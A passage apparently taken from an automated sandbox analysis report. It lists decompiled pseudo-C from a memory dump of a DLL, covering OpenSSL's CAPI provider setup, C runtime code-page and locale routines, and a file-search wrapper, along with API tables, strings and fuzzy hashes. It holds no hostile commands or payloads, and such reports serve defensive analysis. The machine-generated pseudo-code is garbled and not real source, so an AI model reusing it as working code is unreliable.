				signed int _t74;
				void* _t75;
				short* _t76;

				_t56 = __ecx;
				E6E52F9A0();
				_t24 =  *0x6e688c24; // 0x8e9367b0
				_v8 = _t24 ^ _t74;
				_t52 = _a12;
				_t69 = _a8;
				_t64 = _a4;
				_push(_t52);
				E6E584870(_t52, _t74, __fp0, _t64, "capi_ctx_set_provname, name=%s, type=%d\n", _t69);
				_t76 = _t75 + 0x10;
				if(_a16 == 0) {
					L5:
					_t70 = E6E561200(_t69, "engines\\e_capi.c", 0x675);
					if(_t70 != 0) {
						_push(0x67a);
						_push("engines\\e_capi.c");
						E6E55C7C0( *((intOrPtr*)(_t64 + 0xc)));
						 *((intOrPtr*)(_t64 + 0xc)) = _t70;
						 *((intOrPtr*)(_t64 + 0x10)) = _t52;
						_pop(_t71);
						__eflags = _v8 ^ _t74;
						return E6E52F227(_v8 ^ _t74, _t71);
					} else {
						_t31 =  *0x6e68e398;
						_t90 = _t31;
						if(_t31 == 0) {
							 *0x6e68e398 = E6E552AE0(_t56);
						}
						E6E552F50(_t52, _t56, _t74, _t90, _t31, 0x66, 0x41, "engines\\e_capi.c", 0x677);
						_pop(_t72);
						return E6E52F227(_v8 ^ _t74, _t72);
					}
				} else {
					_t35 = MultiByteToWideChar(0, 0, _t69, 0xffffffff, 0, 0);
					_v24 = _t35;
					if(_t35 == 0) {
						L9:
						_t36 =  *0x6e68e398;
						__eflags =  *0x6e68e398;
						if(__eflags == 0) {
							 *0x6e68e398 = E6E552AE0(_t56);
						}
						E6E552F50(_t52, _t56, _t74, __eflags, _t36, 0x66, 0x68, "engines\\e_capi.c", 0x66f);
						_push(GetLastError());
						_push("%lX");
						_push(0xa);
						_push( &_v20);
						E6E55CB70(__eflags);
						_push( &_v20);
						_push("Error code= 0x");
						E6E5525B0();
						_t73 = 2;
						__eflags = _v8 ^ _t74;
						return E6E52F227(_v8 ^ _t74, _t73);
					} else {
						E6E530020();
						_t46 = _t76;
						_v28 = _t46;
						MultiByteToWideChar(0, 0, _t69, 0xffffffff, _t46, _v24);
						_t48 = _v28;
						if(_t48 == 0) {
							goto L9;
						} else {
							_t49 =  &_v32;
							__imp__CryptAcquireContextW(_t49, 0, _t48, _t52, 0xf0000000);
							if(_t49 == 0) {
								goto L9;
							} else {
								CryptReleaseContext(_v32, 0);
								goto L5;
							}
						}
					}
				}
			}

0x6e584ea0
0x6e584ea8
0x6e584ead
0x6e584eb4
0x6e584eb8
0x6e584ebc
0x6e584ec0
0x6e584ec3
0x6e584ecb
0x6e584ed0
0x6e584ed7
0x6e584f3b
0x6e584f4b
0x6e584f52
0x6e585002
0x6e585007
0x6e58500f
0x6e585017
0x6e58501a
0x6e585026
0x6e58502b
0x6e585035
0x6e584f58
0x6e584f58
0x6e584f5d
0x6e584f5f
0x6e584f66
0x6e584f66
0x6e584f7a
0x6e584f88
0x6e584f97
0x6e584f97
0x6e584ed9
0x6e584ee4
0x6e584eea
0x6e584eef
0x6e584f98
0x6e584f98
0x6e584f9d
0x6e584f9f
0x6e584fa6
0x6e584fa6
0x6e584fba
0x6e584fc8
0x6e584fc9
0x6e584fd1
0x6e584fd3
0x6e584fd4
0x6e584fdc
0x6e584fdd
0x6e584fe4
0x6e584ff2
0x6e584ff7
0x6e585001
0x6e584ef5
0x6e584ef7
0x6e584efc
0x6e584f01
0x6e584f0c
0x6e584f12
0x6e584f17
0x00000000
0x6e584f19
0x6e584f22
0x6e584f26
0x6e584f2e
0x00000000
0x6e584f30
0x6e584f35
0x00000000
0x6e584f35
0x6e584f2e
0x6e584f17
0x6e584eef

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6E584EE4
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 6E584F0C
CryptAcquireContextW.ADVAPI32(?,00000000,?,?,F0000000,?,00000000), ref: 6E584F26
CryptReleaseContext.ADVAPI32(?,00000000,?,00000000), ref: 6E584F35
GetLastError.KERNEL32 ref: 6E584FC2

Strings

Error code= 0x, xrefs: 6E584FDD
engines\e_capi.c, xrefs: 6E584F40, 6E584F70, 6E584FB0, 6E585007
%lX, xrefs: 6E584FC9
capi_ctx_set_provname, name=%s, type=%d, xrefs: 6E584EC5

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharContextCryptMultiWide$AcquireErrorLastRelease
String ID: %lX$Error code= 0x$capi_ctx_set_provname, name=%s, type=%d$engines\e_capi.c
API String ID: 2868654666-3877675152
Opcode ID: b9d001ef344915c1d74682da5890c3f776e110911d3b28c77e86c8be422da932
Instruction ID: 88074eee68f9fea83d856e1d26e6955d288e19519ad847411c78471cd7072f1a
Opcode Fuzzy Hash: b9d001ef344915c1d74682da5890c3f776e110911d3b28c77e86c8be422da932
Instruction Fuzzy Hash: 6E41C575A40205BBEB10DFE5AC42FEF77ACEB55715F100429FA19EA3C0EB619D1086A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E54E8C1, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E54E8C1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t78;
				intOrPtr* _t85;
				short* _t87;
				intOrPtr* _t92;
				intOrPtr* _t96;
				signed int _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t120;
				signed int* _t121;
				intOrPtr* _t124;
				signed short _t126;
				int _t128;
				void* _t129;
				void* _t132;
				signed int _t133;

				_push(__ecx);
				_push(__ecx);
				_t85 = _a4;
				_push(__edi);
				_t33 = E6E5410D8(__ecx, __edx);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t124 = _t3;
				_t4 = _t124 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t124 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t124 + 4; // 0x54
				_t117 = _t6;
				_v8 = _t34;
				_t92 = _t85;
				_t35 = _t85 + 0x80;
				 *_t124 = _t85;
				 *_t117 = _t35;
				if( *_t35 != 0) {
					E6E54E854(0x6e627bf0, 0x16, _t117);
					_t92 =  *_t124;
					_t132 = _t132 + 0xc;
					_t114 = 0;
				}
				_push(_t124);
				if( *_t92 == _t114) {
					E6E54E1C5(_t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t117)) == _t114) {
						E6E54E2E5();
					} else {
						E6E54E24C(_t92);
					}
					if( *((intOrPtr*)(_t124 + 8)) == 0) {
						_t78 = E6E54E854(0x6e6278e0, 0x40, _t124);
						_t132 = _t132 + 0xc;
						if(_t78 != 0) {
							_push(_t124);
							if( *((intOrPtr*)( *_t117)) == 0) {
								E6E54E2E5();
							} else {
								E6E54E24C(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t124 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t85 + 0x100;
					if( *_t85 != 0 ||  *_t38 != 0) {
						_t39 = E6E54E711(_t38, _t124);
					} else {
						_t39 = GetACP();
					}
					_t126 = _t39;
					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t126;
						}
						_t120 = _a12;
						if(_t120 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t120 + 0x120; // 0xd0
							_t87 = _t15;
							 *_t87 = 0;
							_t16 = _t96 + 2; // 0x3
							_t115 = _t16;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t18 = (_t96 - _t115 >> 1) + 1; // 0x0
							_t47 = E6E54E113(_t87, 0x55, _v8);
							_t133 = _t132 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6E53498C();
								asm("int3");
								_t131 = _t133;
								_t50 =  *0x6e688c24; // 0x8e9367b0
								_v52 = _t50 ^ _t133;
								_push(_t87);
								_push(_t126);
								_push(_t120);
								_t52 = E6E5410D8(_t98, _t115);
								_t88 = _t52;
								_t121 =  *(E6E5410D8(_t98, _t115) + 0x34c);
								_t128 = E6E54EFFC(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E6E5481CE(_t121, _t128,  *((intOrPtr*)(_t88 + 0x54)),  &_v252) == 0 && E6E54F12E(_t128) != 0) {
										 *_t121 =  *_t121 | 0x00000004;
										_t121[2] = _t128;
										_t121[1] = _t128;
									}
								} else {
									 *_t121 =  *_t121 & _t56;
								}
								_pop(_t129);
								return E6E52F227(_v12 ^ _t131, _t129);
							} else {
								if(E6E544B0D(_t87, 0x1001, _t120, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t120 + 0x80; // 0x30
									_t87 = _t20;
									_t21 = _t120 + 0x120; // 0xd0
									if(E6E544B0D(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t69 = E6E612087(_t98);
										_t98 = _t87;
										if(_t69 != 0) {
											L31:
											_t22 = _t120 + 0x120; // 0xd0
											if(E6E544B0D(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t74 = E6E612087(_t98);
											_t98 = _t87;
											if(_t74 == 0) {
												L32:
												_t120 = _t120 + 0x100;
												if(_t126 != 0xfde9) {
													E6E550E15(_t98, _t126, _t120, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t73 = E6E54E113(_t120, 0x10, L"utf8");
													_t133 = _t133 + 0x10;
													if(_t73 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x6e54e8c6
0x6e54e8c7
0x6e54e8c9
0x6e54e8cd
0x6e54e8ce
0x6e54e8d5
0x6e54e8d7
0x6e54e8da
0x6e54e8da
0x6e54e8dd
0x6e54e8dd
0x6e54e8e3
0x6e54e8e6
0x6e54e8e9
0x6e54e8e9
0x6e54e8ec
0x6e54e8ef
0x6e54e8f1
0x6e54e8f7
0x6e54e8f9
0x6e54e8fe
0x6e54e908
0x6e54e90d
0x6e54e90f
0x6e54e912
0x6e54e912
0x6e54e914
0x6e54e918
0x6e54e961
0x00000000
0x6e54e91a
0x6e54e91f
0x6e54e928
0x6e54e921
0x6e54e921
0x6e54e921
0x6e54e933
0x6e54e93d
0x6e54e942
0x6e54e947
0x6e54e94d
0x6e54e951
0x6e54e95a
0x6e54e953
0x6e54e953
0x6e54e953
0x6e54e966
0x6e54e966
0x6e54e947
0x6e54e933
0x6e54e96c
0x6e54eaa8
0x6e54eaa8
0x00000000
0x6e54e972
0x6e54e972
0x6e54e97b
0x6e54e98c
0x6e54e982
0x6e54e982
0x6e54e982
0x6e54e993
0x6e54e997
0x00000000
0x6e54e9bb
0x6e54e9bb
0x6e54e9c0
0x6e54e9c2
0x6e54e9c2
0x6e54e9c4
0x6e54e9c9
0x6e54eaa3
0x6e54eaa5
0x6e54eaaa
0x6e54eaae
0x6e54e9cf
0x6e54e9cf
0x6e54e9d2
0x6e54e9d2
0x6e54e9da
0x6e54e9dd
0x6e54e9dd
0x6e54e9e0
0x6e54e9e0
0x6e54e9e3
0x6e54e9e6
0x6e54e9f0
0x6e54e9fa
0x6e54e9ff
0x6e54ea04
0x6e54eaaf
0x6e54eab1
0x6e54eab2
0x6e54eab3
0x6e54eab4
0x6e54eab5
0x6e54eab6
0x6e54eabb
0x6e54eabf
0x6e54eac7
0x6e54eace
0x6e54ead1
0x6e54ead2
0x6e54ead6
0x6e54ead7
0x6e54eadc
0x6e54eae4
0x6e54eaf3
0x6e54eaff
0x6e54eb10
0x6e54eb18
0x6e54eb32
0x6e54eb3f
0x6e54eb42
0x6e54eb45
0x6e54eb45
0x6e54eb1a
0x6e54eb1a
0x6e54eb1c
0x6e54eb56
0x6e54eb60
0x6e54ea0a
0x6e54ea1a
0x00000000
0x6e54ea20
0x6e54ea22
0x6e54ea22
0x6e54ea2e
0x6e54ea3c
0x00000000
0x6e54ea3e
0x6e54ea3e
0x6e54ea41
0x6e54ea47
0x6e54ea4a
0x6e54ea5a
0x6e54ea5f
0x6e54ea6d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e54ea4c
0x6e54ea4c
0x6e54ea4f
0x6e54ea55
0x6e54ea58
0x6e54ea6f
0x6e54ea6f
0x6e54ea7b
0x6e54ea9b
0x00000000
0x6e54ea7d
0x6e54ea7d
0x6e54ea87
0x6e54ea8c
0x6e54ea91
0x00000000
0x6e54ea93
0x00000000
0x6e54ea93
0x6e54ea91
0x00000000
0x00000000
0x00000000
0x6e54ea58
0x6e54ea4a
0x6e54ea3c
0x6e54ea1a
0x6e54ea04
0x6e54e9c9
0x6e54e997

APIs

Part of subcall function 6E5410D8: GetLastError.KERNEL32(6E53413C,6E53413C,900C408B,6E54571D,?,6E53413C,00000000,?,6E545BD7,6E53413C,?,6E53413C,6E53413C,00000010,6E53956D,00000000), ref: 6E5410DD
Part of subcall function 6E5410D8: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E545BD7,6E53413C,?,6E53413C,6E53413C,00000010,6E53956D,00000000,8304488B,?,?,00000000), ref: 6E54117B

GetACP.KERNEL32(?,?,?,?,?,?,6E543361,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 6E54E982
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E543361,?,?,?,00000055,?,-00000050,?,?), ref: 6E54E9AD
_wcschr.LIBVCRUNTIME ref: 6E54EA41
_wcschr.LIBVCRUNTIME ref: 6E54EA4F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E54EB10

Strings

utf8, xrefs: 6E54EA7F

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 280bca125ad120000b8cc9b78dbb6f779f3e5cb8d1b8bfad0f5411ab736dc283
Instruction ID: 3211ac91b4b0eefabd9c6957c0e0632fd974adc437a98bb190dd79de506ded56
Opcode Fuzzy Hash: 280bca125ad120000b8cc9b78dbb6f779f3e5cb8d1b8bfad0f5411ab736dc283
Instruction Fuzzy Hash: 7771D471A44302EAEB55DBBACC46BBA73ECAF85714F10482AE615DF180EF70E941C761

Uniqueness

Uniqueness Score: -1.00%

Function 6E56CD40, Relevance: 10.7, APIs: 7, Instructions: 242
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E56CD40(void* __ebx, void* __edi, struct _WIN32_FIND_DATAW** _a4, char* _a8) {
				signed int _v8;
				int _v12;
				signed int _v16;
				int _v20;
				void* _v32;
				void* __esi;
				signed int _t62;
				struct _WIN32_FIND_DATAW* _t68;
				signed int _t69;
				struct _WIN32_FIND_DATAW* _t70;
				signed int _t72;
				intOrPtr _t78;
				struct _WIN32_FIND_DATAW* _t80;
				int _t82;
				signed int _t88;
				struct _WIN32_FIND_DATAW* _t90;
				short _t92;
				short _t93;
				long _t94;
				WCHAR* _t96;
				void* _t102;
				intOrPtr* _t106;
				short* _t107;
				int _t109;
				void* _t115;
				WCHAR* _t116;
				signed int _t118;
				signed int _t119;
				char* _t120;
				short* _t121;
				struct _WIN32_FIND_DATAW** _t123;
				void* _t127;
				signed int _t128;
				int _t129;
				void* _t130;
				intOrPtr* _t131;
				signed int _t132;
				WCHAR* _t133;
				signed int _t134;
				void* _t135;
				void* _t138;
				WCHAR* _t139;

				E6E52F9A0();
				_t62 =  *0x6e688c24; // 0x8e9367b0
				_v8 = _t62 ^ _t134;
				_t123 = _a4;
				if(_t123 == 0) {
					L26:
					 *((intOrPtr*)(E6E537E6F(__eflags))) = 0x16;
					goto L27;
				} else {
					_t106 = _a8;
					_t142 = _t106;
					if(_t106 == 0) {
						goto L26;
					} else {
						 *(E6E537E6F(_t142)) = 0;
						_t68 =  *_t123;
						if(_t68 != 0) {
							_t69 = FindNextFileW( *(_t68 + 0x250), _t68);
							__eflags = _t69;
							if(_t69 == 0) {
								goto L27;
							} else {
								goto L38;
							}
						} else {
							_t131 = _t106;
							_t115 = _t131 + 1;
							asm("o16 nop [eax+eax]");
							do {
								_t78 =  *_t131;
								_t131 = _t131 + 1;
							} while (_t78 != 0);
							_t132 = _t131 - _t115;
							if(_t132 == 0 || _t132 > 0x7ffffffc) {
								 *((intOrPtr*)(E6E537E6F(__eflags))) = 2;
								goto L27;
							} else {
								_push(0x354);
								_t80 = E6E539FA6();
								_t138 = _t135 + 4;
								 *_t123 = _t80;
								_t147 = _t80;
								if(_t80 != 0) {
									E6E531060(_t123, _t80, 0, 0x354);
									_t139 = _t138 + 0xc;
									_v12 = 0xfde9;
									_t109 = _t132 + 1;
									_t82 = MultiByteToWideChar(0xfde9, 0, _a8, _t109, 0, 0);
									_v20 = _t82;
									__eflags = _t82;
									if(_t82 > 0) {
										L23:
										E6E530020();
										_t133 = _t139;
										__eflags = MultiByteToWideChar(_v12, 0, _a8, _t109, _t133, _v20);
										if(__eflags != 0) {
											goto L29;
										} else {
											_push( *_t123);
											goto L25;
										}
									} else {
										_t94 = GetLastError();
										__eflags = _t94 - 0x459;
										if(_t94 != 0x459) {
											L12:
											_v20 = _t109;
											E6E530020();
											_t96 = _t139;
											_t118 = 0;
											_v12 = _t96;
											__eflags = _t109;
											if(_t109 == 0) {
												_t133 = _v12;
											} else {
												_t120 = _a8;
												__eflags = _t109 - 0x20;
												if(_t109 < 0x20) {
													_t133 = _v12;
													goto L21;
												} else {
													_v16 =  &(_t96[_t132]);
													_t133 = _t139;
													__eflags = _t133 - _t132 + _t120;
													if(_t133 > _t132 + _t120) {
														L16:
														_v16 = _t109 & 0xffffffe0;
														_t102 = _t120 + 0x10;
														_t121 =  &(_t133[0x10]);
														asm("o16 nop [eax+eax]");
														do {
															asm("movq xmm0, [eax-0x10]");
															_t121 =  &(_t121[0x20]);
															asm("punpcklbw xmm0, xmm0");
															_t102 = _t102 + 0x20;
															asm("psraw xmm0, 0x8");
															_t118 = _t118 + 0x20;
															asm("movups [edx-0x60], xmm0");
															asm("movq xmm0, [eax-0x28]");
															asm("punpcklbw xmm0, xmm0");
															asm("psraw xmm0, 0x8");
															asm("movups [edx-0x50], xmm0");
															asm("movq xmm0, [eax-0x20]");
															asm("punpcklbw xmm0, xmm0");
															asm("psraw xmm0, 0x8");
															asm("movups [edx-0x40], xmm0");
															asm("movq xmm0, [eax-0x18]");
															asm("punpcklbw xmm0, xmm0");
															asm("psraw xmm0, 0x8");
															asm("movups [edx-0x30], xmm0");
															__eflags = _t118 - _v16;
														} while (_t118 < _v16);
														_t120 = _a8;
														_v16 = _t118;
														__eflags = _t118 - _t109;
														if(_t118 < _t109) {
															goto L21;
														}
													} else {
														__eflags = _v16 - _t120;
														if(_v16 >= _t120) {
															do {
																L21:
																_t133[_t118] =  *((char*)(_t118 + _t120));
																_t118 = _t118 + 1;
																__eflags = _t118 - _t109;
															} while (_t118 < _t109);
														} else {
															goto L16;
														}
													}
												}
											}
											L29:
											_t116 =  &(_t133[_v20 - 1]);
											_t88 =  *(_t116 - 2) & 0x0000ffff;
											__eflags = _t88 - 0x2a;
											if(_t88 != 0x2a) {
												__eflags = _t88 - 0x2f;
												if(_t88 == 0x2f) {
													L33:
													 *_t116 = 0x2a;
												} else {
													__eflags = _t88 - 0x5c;
													if(_t88 == 0x5c) {
														goto L33;
													} else {
														_t92 =  *0x6e646010; // 0x2a002f
														 *_t116 = _t92;
														_t93 =  *0x6e646014; // 0x0
														_t116[2] = _t93;
													}
												}
											}
											 *((intOrPtr*)( *_t123 + 0x250)) = FindFirstFileW(_t133,  *_t123);
											_t90 =  *_t123;
											__eflags =  *((intOrPtr*)(_t90 + 0x250)) - 0xffffffff;
											if(__eflags != 0) {
												L38:
												_t70 =  *_t123;
												_t128 = 0;
												__eflags = _t70->cFileName;
												_t51 =  &(_t70->cFileName); // 0x2c
												_t107 = _t51;
												if(_t70->cFileName != 0) {
													while(1) {
														__eflags = _t128 - 0xff;
														if(_t128 >= 0xff) {
															goto L41;
														}
														_t128 = _t128 + 1;
														__eflags = _t107[_t128];
														if(_t107[_t128] != 0) {
															continue;
														}
														goto L41;
													}
												}
												L41:
												_t129 = _t128 + 1;
												_t72 = WideCharToMultiByte(0xfde9, 0, _t107, _t129, _t70 + 0x254, 0x100, 0, 0);
												__eflags = _t72;
												if(_t72 == 0) {
													_t119 = 0;
													__eflags = _t129;
													if(_t129 != 0) {
														do {
															 *((char*)( *_t123 + _t119 + 0x254)) = _t107[_t119];
															_t119 = _t119 + 1;
															__eflags = _t119 - _t129;
														} while (_t119 < _t129);
													}
												}
												 *((char*)( *_t123 + 0x353)) = 0;
												_pop(_t130);
												__eflags = _v8 ^ _t134;
												return E6E52F227(_v8 ^ _t134, _t130);
											} else {
												_push(_t90);
												L25:
												E6E5378C1();
												 *_t123 = 0;
												goto L26;
											}
										} else {
											_t82 = MultiByteToWideChar(0, 0, _a8, _t109, 0, 0);
											_v20 = _t82;
											_v12 = 0;
											__eflags = _t82;
											if(_t82 > 0) {
												goto L23;
											} else {
												goto L12;
											}
										}
									}
								} else {
									 *((intOrPtr*)(E6E537E6F(_t147))) = 0xc;
									L27:
									_pop(_t127);
									return E6E52F227(_v8 ^ _t134, _t127);
								}
							}
						}
					}
				}
			}

0x6e56cd48
0x6e56cd4d
0x6e56cd54
0x6e56cd5a
0x6e56cd5f
0x6e56cf3b
0x6e56cf40
0x00000000
0x6e56cd65
0x6e56cd65
0x6e56cd68
0x6e56cd6a
0x00000000
0x6e56cd70
0x6e56cd75
0x6e56cd7b
0x6e56cd7f
0x6e56cfc8
0x6e56cfce
0x6e56cfd0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e56cd85
0x6e56cd85
0x6e56cd87
0x6e56cd8a
0x6e56cd90
0x6e56cd90
0x6e56cd92
0x6e56cd93
0x6e56cd97
0x6e56cd99
0x6e56cfb9
0x00000000
0x6e56cdab
0x6e56cdab
0x6e56cdb0
0x6e56cdb5
0x6e56cdb8
0x6e56cdba
0x6e56cdbc
0x6e56cdd6
0x6e56cddb
0x6e56cdde
0x6e56cde5
0x6e56cdf7
0x6e56cdfd
0x6e56ce00
0x6e56ce02
0x6e56cf05
0x6e56cf0c
0x6e56cf14
0x6e56cf27
0x6e56cf29
0x00000000
0x6e56cf2b
0x6e56cf2b
0x00000000
0x6e56cf2b
0x6e56ce08
0x6e56ce08
0x6e56ce0e
0x6e56ce13
0x6e56ce39
0x6e56ce40
0x6e56ce43
0x6e56ce48
0x6e56ce4a
0x6e56ce4c
0x6e56ce4f
0x6e56ce51
0x6e56cf5c
0x6e56ce57
0x6e56ce57
0x6e56ce5a
0x6e56ce5d
0x6e56cef2
0x00000000
0x6e56ce63
0x6e56ce66
0x6e56ce6c
0x6e56ce6e
0x6e56ce70
0x6e56ce77
0x6e56ce7c
0x6e56ce7f
0x6e56ce82
0x6e56ce85
0x6e56ce90
0x6e56ce90
0x6e56ce95
0x6e56ce98
0x6e56ce9c
0x6e56ce9f
0x6e56cea4
0x6e56cea7
0x6e56ceab
0x6e56ceb0
0x6e56ceb4
0x6e56ceb9
0x6e56cebd
0x6e56cec2
0x6e56cec6
0x6e56cecb
0x6e56cecf
0x6e56ced4
0x6e56ced8
0x6e56cedd
0x6e56cee1
0x6e56cee1
0x6e56cee6
0x6e56cee9
0x6e56ceec
0x6e56ceee
0x00000000
0x6e56cef0
0x6e56ce72
0x6e56ce72
0x6e56ce75
0x6e56cef5
0x6e56cef5
0x6e56cefa
0x6e56cefe
0x6e56ceff
0x6e56ceff
0x00000000
0x00000000
0x00000000
0x6e56ce75
0x6e56ce70
0x6e56ce5d
0x6e56cf5f
0x6e56cf63
0x6e56cf66
0x6e56cf6a
0x6e56cf6d
0x6e56cf6f
0x6e56cf72
0x6e56cf8c
0x6e56cf8c
0x6e56cf74
0x6e56cf74
0x6e56cf77
0x00000000
0x6e56cf79
0x6e56cf79
0x6e56cf7e
0x6e56cf80
0x6e56cf86
0x6e56cf86
0x6e56cf77
0x6e56cf72
0x6e56cf9d
0x6e56cfa3
0x6e56cfa5
0x6e56cfac
0x6e56cfd6
0x6e56cfd6
0x6e56cfd8
0x6e56cfda
0x6e56cfde
0x6e56cfde
0x6e56cfe1
0x6e56cfe3
0x6e56cfe3
0x6e56cfe9
0x00000000
0x00000000
0x6e56cfeb
0x6e56cfec
0x6e56cff1
0x00000000
0x00000000
0x00000000
0x6e56cff1
0x6e56cfe3
0x6e56cff3
0x6e56d001
0x6e56d00c
0x6e56d012
0x6e56d014
0x6e56d016
0x6e56d018
0x6e56d01a
0x6e56d020
0x6e56d025
0x6e56d02c
0x6e56d02d
0x6e56d02d
0x6e56d020
0x6e56d01a
0x6e56d033
0x6e56d045
0x6e56d04a
0x6e56d054
0x6e56cfae
0x6e56cfae
0x6e56cf2d
0x6e56cf2d
0x6e56cf35
0x00000000
0x6e56cf35
0x6e56ce15
0x6e56ce21
0x6e56ce27
0x6e56ce2a
0x6e56ce31
0x6e56ce33
0x00000000
0x00000000
0x00000000
0x00000000
0x6e56ce33
0x6e56ce13
0x6e56cdbe
0x6e56cdc3
0x6e56cf46
0x6e56cf4c
0x6e56cf5b
0x6e56cf5b
0x6e56cdbc
0x6e56cd99
0x6e56cd7f
0x6e56cd6a

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 6E56CDF7
GetLastError.KERNEL32 ref: 6E56CE08
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 6E56CE21
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?), ref: 6E56CF21
FindFirstFileW.KERNEL32(?,?,?,?), ref: 6E56CF95
FindNextFileW.KERNEL32(?,00000000), ref: 6E56CFC8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000002C,00000001,-00000254,00000100,00000000,00000000), ref: 6E56D00C

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$FileFind$ErrorFirstLastNext
String ID:
API String ID: 384036507-0
Opcode ID: 7a61d46c203d9fa3c4f59f589ce03e78b36e656360d7ae35892ae0e2a0a90bb1
Instruction ID: 0385c4214281248c8a3115fba7c2ab5031d012593ac3bcfae318362ac335811d
Opcode Fuzzy Hash: 7a61d46c203d9fa3c4f59f589ce03e78b36e656360d7ae35892ae0e2a0a90bb1
Instruction Fuzzy Hash: 93910570910216DFEB119FA8C894BAEFBF4FF45304F1085A9E915AF2A1F7309980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E54F04D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E54F04D(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
